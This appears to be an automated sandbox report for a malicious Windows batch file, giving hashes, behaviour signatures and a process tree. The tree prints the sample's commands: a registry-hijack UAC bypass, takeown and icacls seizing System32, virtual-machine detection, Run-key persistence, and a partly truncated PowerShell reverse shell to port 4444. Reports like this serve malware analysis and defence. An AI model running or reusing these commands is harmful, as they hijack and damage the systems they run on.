Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    110s
  • max time network
    206s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/09/2024, 06:47

General

  • Target

    custom.bat

  • Size

    4KB

  • MD5

    1c63745d54962d205bb3ae879bea1ed4

  • SHA1

    a832c894a4e2b6d486c48b9ea6ec79d94df9537e

  • SHA256

    396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e

  • SHA512

    129d73d0fd5967b232c54d50bc94ed171dd2ee5da2222b18bd350b42808799575a3a726c7b0b46b65d2717d025b9ebeb424a834f42540daf8308be3171a4af39

  • SSDEEP

    96:NQN1Vh0eAwx86mwCVHVsOvx8vXSu7eQ/GdZj/BawH6im7BFVPhGHixL:NOueA8CVHiOvx8vC0emG7LBawH6/Yix

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 2 IoCs
  • Gathers system information 1 TTPs 3 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4088
    • C:\Windows\system32\mode.com
      mode con: cols=800 lines=60
      2⤵
        PID:1084
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1148
      • C:\Windows\system32\timeout.exe
        timeout /t 5
        2⤵
        • Delays execution with timeout.exe
        PID:992
      • C:\Windows\system32\reg.exe
        reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" /f
        2⤵
        • Modifies registry class
        PID:2660
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4872
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\* /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:1344
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\* /grant Admin:F /t /c
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1296
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\drivers\* /grant Admin:F /t /c
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:636
        • C:\Windows\system32\mode.com
          mode con: cols=800 lines=60
          3⤵
            PID:2360
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3008
        • C:\Windows\system32\timeout.exe
          timeout /t 5
          2⤵
          • Delays execution with timeout.exe
          PID:3068
        • C:\Windows\system32\reg.exe
          reg delete "HKCU\Software\Classes\mscfile" /f
          2⤵
          • Modifies registry class
          PID:4508
        • C:\Windows\system32\systeminfo.exe
          systeminfo
          2⤵
          • Gathers system information
          PID:1400
        • C:\Windows\system32\findstr.exe
          findstr /i "VirtualBox"
          2⤵
            PID:1664
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            2⤵
            • Gathers system information
            PID:2548
          • C:\Windows\system32\findstr.exe
            findstr /i "VMware"
            2⤵
              PID:1128
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              2⤵
              • Gathers system information
              PID:1836
            • C:\Windows\system32\findstr.exe
              findstr /i "Hyper-V"
              2⤵
                PID:3820
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:464
              • C:\Windows\system32\reg.exe
                reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f
                2⤵
                • Adds Run key to start application
                PID:3508
              • C:\Windows\system32\takeown.exe
                takeown /f C:\Windows\System32\* /r /d y
                2⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                • Suspicious use of AdjustPrivilegeToken
                PID:3972

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              2KB

              MD5

              2f57fde6b33e89a63cf0dfdd6e60a351

              SHA1

              445bf1b07223a04f8a159581a3d37d630273010f

              SHA256

              3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

              SHA512

              42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              a2b24af1492f112d2e53cb7415fda39f

              SHA1

              dbfcee57242a14b60997bd03379cc60198976d85

              SHA256

              fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073

              SHA512

              9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              948B

              MD5

              310c4040e72365ea4993113fd77611ce

              SHA1

              3dbdc46110454c95ef61e3e88d0e8cb7f90ea5a6

              SHA256

              11223ab7bdbe8d600e56b0d681f1c5109b7a8bd1bdf03a16975c8e77a8dd131f

              SHA512

              deae0c82677b8202d26faa751eeeac868050745d3aedc1ac297d13d6b92ce434e8d5c620eb39b8f87647ba0b9a8f46b89a14b664f6f9a58c5c03834c5afc5bee

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zg5jojtw.ckz.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\full_destruction.bat

              Filesize

              285B

              MD5

              4577f08330df24a350ff523ec87bf38e

              SHA1

              5bd1a1b1b8ca3b007102a75f7abaf72348955cf2

              SHA256

              5ef497b0848b259cbfdeb4057846d9a0f3907ec77aabe44219462ac6160bacae

              SHA512

              ed614d6c11981ac9b1aaee0455f4d1b07dce08c0e04fb9f78ad3a7c57db0ecd8e9e0fe21292e599b4963acc8bb66e8db88759fd5fd5fee94df4d3f75cab736c2

            • memory/1148-0-0x00007FF80A7A3000-0x00007FF80A7A5000-memory.dmp

              Filesize

              8KB

            • memory/1148-6-0x0000020EDC8B0000-0x0000020EDC8D2000-memory.dmp

              Filesize

              136KB

            • memory/1148-11-0x00007FF80A7A0000-0x00007FF80B261000-memory.dmp

              Filesize

              10.8MB

            • memory/1148-12-0x00007FF80A7A0000-0x00007FF80B261000-memory.dmp

              Filesize

              10.8MB

            • memory/1148-15-0x00007FF80A7A0000-0x00007FF80B261000-memory.dmp

              Filesize

              10.8MB